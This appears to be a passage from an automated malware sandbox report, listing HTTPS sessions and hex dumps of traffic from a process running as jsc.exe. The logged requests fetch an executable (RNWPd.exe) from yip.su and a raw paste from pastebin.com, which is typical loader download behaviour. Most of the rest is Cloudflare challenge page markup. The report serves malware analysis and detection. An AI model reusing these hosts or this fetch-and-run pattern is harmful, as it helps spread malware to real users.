                                    2024-08-17 22:08:34 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:08:34 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:08:34 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:08:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.549733188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:34 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:34 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:08:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:08:34 UTC687INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 7a 4d 74 62 57 67 77 67 4a 61 6b 2f 32 6a 72 71 66 4f 61 35 4e 31 53 4c 56 66 31 37 76 6b 66 47 4d 77 41 68 32 42 6b 4c 4b 2f 45 77 36 51 45 64 55 65 37 6d 52 7a 4d 39 46 67 4b 5a 51 59 30 68 57 75 6d 32 75 54 39 35 56 55 73 73 39 39 62 31 6e 30 55 42 54 43 55 56 51 79 58 32 50 64 4f 2b 59 2b 4a 71 34 6f 79 47 2b 4b 34 3d 24 6a 61 48 58 4e 39 72 55 6a 73 7a 61 4f 43 48 34 70 62 2f 75 46 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: zMtbWgwgJak/2jrqfOa5N1SLVf17vkfGMwAh2BkLK/Ew6QEdUe7mRzM9FgKZQY0hWum2uT95VUss99b1n0UBTCUVQyX2PdO+Y+Jq4oyG+K4=$jaHXN9rUjszaOCH4pb/uFw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:08:34 UTC766INData Raw: 33 65 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3e10<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:08:34 UTC1369INData Raw: 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79
                                    Data Ascii: ody .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My
                                    2024-08-17 22:08:34 UTC1369INData Raw: 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 66 6f 6e 74 2d 72 65 64 7b 63
                                    Data Ascii: dy.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{c
                                    2024-08-17 22:08:34 UTC1369INData Raw: 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f
                                    Data Ascii: 0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:#ee730a;text-decoration:underline}body.light .lds-ring div{bo
                                    2024-08-17 22:08:34 UTC1369INData Raw: 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f
                                    Data Ascii: Ny4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:transparent;color:#0051c3;text-decoration:none;transition:colo
                                    2024-08-17 22:08:34 UTC1369INData Raw: 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34
                                    Data Ascii: MTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4
                                    2024-08-17 22:08:34 UTC1369INData Raw: 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74
                                    Data Ascii: .75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;widt
                                    2024-08-17 22:08:34 UTC1369INData Raw: 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a
                                    Data Ascii: ntrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.rtl #challenge-error-text{background-position:100%;padding-left:
                                    2024-08-17 22:08:34 UTC1369INData Raw: 72 30 74 54 43 4c 62 2e 61 38 68 70 35 39 46 78 41 6d 6b 35 62 4e 78 71 74 33 66 47 68 5a 67 42 56 52 6f 67 4b 50 46 6f 55 61 65 56 2e 44 52 5f 47 47 7a 56 32 4b 44 54 74 54 39 38 32 65 72 4f 48 6d 78 54 39 6a 64 51 79 5a 36 4c 72 38 49 41 2e 75 64 68 76 54 4e 75 47 37 71 66 32 49 43 47 69 4f 56 4f 5f 4d 41 58 52 69 4d 73 73 74 63 62 79 35 59 62 32 44 6f 45 6b 79 63 77 4d 61 6c 53 57 4b 75 6e 32 57 48 64 50 76 41 75 6f 6d 48 4a 63 78 42 41 4f 78 4c 4a 66 6b 39 62 31 4e 38 35 5a 44 73 5f 51 56 48 7a 54 6a 44 74 79 44 63 77 70 33 72 5a 63 62 61 58 74 5f 61 63 30 79 64 69 42 62 45 4e 38 77 55 75 72 71 38 48 34 46 51 66 65 64 41 5f 55 6d 77 43 71 33 53 6a 77 35 71 77 5f 4d 76 77 32 47 54 67 78 49 56 57 76 5a 55 49 4e 61 42 69 42 6d 7a 31 50 39 42 5f 2e 75 38
                                    Data Ascii: r0tTCLb.a8hp59FxAmk5bNxqt3fGhZgBVRogKPFoUaeV.DR_GGzV2KDTtT982erOHmxT9jdQyZ6Lr8IA.udhvTNuG7qf2ICGiOVO_MAXRiMsstcby5Yb2DoEkycwMalSWKun2WHdPvAuomHJcxBAOxLJfk9b1N85ZDs_QVHzTjDtyDcwp3rZcbaXt_ac0ydiBbEN8wUurq8H4FQfedA_UmwCq3Sjw5qw_Mvw2GTgxIVWvZUINaBiBmz1P9B_.u8


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.549734104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:39 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:40 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:08:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfbea2f6a17b1-EWR
                                    2024-08-17 22:08:40 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:08:40 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:08:40 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:08:40 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:08:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    13192.168.2.549735188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:40 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:40 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:08:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
